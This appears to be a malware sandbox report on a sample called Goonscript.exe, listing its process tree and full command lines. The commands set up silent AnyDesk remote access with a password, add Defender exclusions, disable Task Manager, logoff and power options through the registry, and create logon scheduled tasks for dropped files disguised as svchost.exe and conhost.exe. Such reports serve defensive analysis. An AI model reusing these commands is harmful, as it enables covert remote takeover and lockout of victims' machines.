N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3904 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\Goonscript.exe C:\Windows\system32\wscript.exe
PID 3904 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\Goonscript.exe C:\Windows\system32\wscript.exe
PID 3808 wrote to memory of 3304 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Roaming\doorbell-sys.exe
PID 3808 wrote to memory of 3304 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Roaming\doorbell-sys.exe
PID 3304 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Roaming\doorbell-sys.exe C:\Windows\system32\cmd.exe
PID 3304 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Roaming\doorbell-sys.exe C:\Windows\system32\cmd.exe
PID 2880 wrote to memory of 4348 N/A C:\Windows\system32\cmd.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 2880 wrote to memory of 4348 N/A C:\Windows\system32\cmd.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 2880 wrote to memory of 4348 N/A C:\Windows\system32\cmd.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 4348 wrote to memory of 1164 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 4348 wrote to memory of 1164 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 4348 wrote to memory of 1164 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 4348 wrote to memory of 4700 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 4348 wrote to memory of 4700 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 4348 wrote to memory of 4700 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 3808 wrote to memory of 4940 N/A C:\Windows\system32\wscript.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3808 wrote to memory of 4940 N/A C:\Windows\system32\wscript.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2880 wrote to memory of 5616 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 2880 wrote to memory of 5616 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 2880 wrote to memory of 5616 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 3808 wrote to memory of 5848 N/A C:\Windows\system32\wscript.exe C:\Program Files\VideoLAN\VLC\vlc.exe
PID 3808 wrote to memory of 5848 N/A C:\Windows\system32\wscript.exe C:\Program Files\VideoLAN\VLC\vlc.exe
PID 3808 wrote to memory of 3832 N/A C:\Windows\system32\wscript.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3808 wrote to memory of 3832 N/A C:\Windows\system32\wscript.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2880 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2880 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2880 wrote to memory of 776 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 2880 wrote to memory of 776 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 2880 wrote to memory of 776 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 3808 wrote to memory of 5432 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Roaming\locked.exe
PID 3808 wrote to memory of 5432 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Roaming\locked.exe
PID 5432 wrote to memory of 6124 N/A C:\Users\Admin\AppData\Roaming\locked.exe C:\Windows\system32\cmd.exe
PID 5432 wrote to memory of 6124 N/A C:\Users\Admin\AppData\Roaming\locked.exe C:\Windows\system32\cmd.exe
PID 6124 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 5412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 6124 wrote to memory of 5412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2880 wrote to memory of 5488 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 5488 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6124 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\sihclient.exe
PID 6124 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\sihclient.exe
PID 6124 wrote to memory of 4580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 4580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 5584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 5584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 6036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 6036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 3768 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6124 wrote to memory of 3768 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6124 wrote to memory of 4512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 4512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 3972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 3972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2880 wrote to memory of 3676 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 3676 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6124 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6124 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6124 wrote to memory of 5496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 5496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 5620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 5620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 6136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 6136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Goonscript.exe

"C:\Users\Admin\AppData\Local\Temp\Goonscript.exe"

C:\Windows\system32\wscript.exe

"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\E781.tmp\E782.tmp\E783.vbs //Nologo

C:\Users\Admin\AppData\Roaming\doorbell-sys.exe

"C:\Users\Admin\AppData\Roaming\doorbell-sys.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EA41.tmp\EA42.tmp\EA43.bat C:\Users\Admin\AppData\Roaming\doorbell-sys.exe"

\??\c:\users\Admin\downloads\AnyDesk.exe

"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent

\??\c:\users\Admin\downloads\AnyDesk.exe

"c:\users\Admin\downloads\AnyDesk.exe" --local-service

\??\c:\users\Admin\downloads\AnyDesk.exe

"c:\users\Admin\downloads\AnyDesk.exe" --local-control

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4360,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=3596 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ctt.ac/Y6e79

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4908,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=4972 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4964,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --field-trial-handle=5344,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5444 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5588,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5592 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=5864,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5920 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=5324,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6120 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --field-trial-handle=6272,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6268 /prefetch:1

C:\ProgramData\AnyDesk.exe

"C:\ProgramData\AnyDesk.exe" --service

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --field-trial-handle=6416,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6676,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6692 /prefetch:8

C:\ProgramData\AnyDesk.exe

"C:\ProgramData\AnyDesk.exe" --control

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --field-trial-handle=6652,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6680 /prefetch:1

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --remove-password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7020,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7028 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7184,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7192 /prefetch:8

C:\Program Files\VideoLAN\VLC\vlc.exe

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://spankbang.com/tv/?station=hypno+joi

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --field-trial-handle=7348,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7356 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --set-password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --field-trial-handle=7368,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7676 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7640,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7820 /prefetch:8

C:\Users\Admin\AppData\Roaming\locked.exe

"C:\Users\Admin\AppData\Roaming\locked.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --field-trial-handle=7976,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7988 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --field-trial-handle=8104,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=8136 /prefetch:1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2fc 0x300

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6064,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5932 /prefetch:8

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2362.tmp\2363.tmp\2364.bat C:\Users\Admin\AppData\Roaming\locked.exe"

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv Zaa7TMQPjES0SaK7eWRoQg.0.1

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f

C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe

C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk

C:\Windows\system32\timeout.exe

timeout /t 5 /nobreak

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/Anydesk.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"

C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe

C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\schtasks.exe

schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

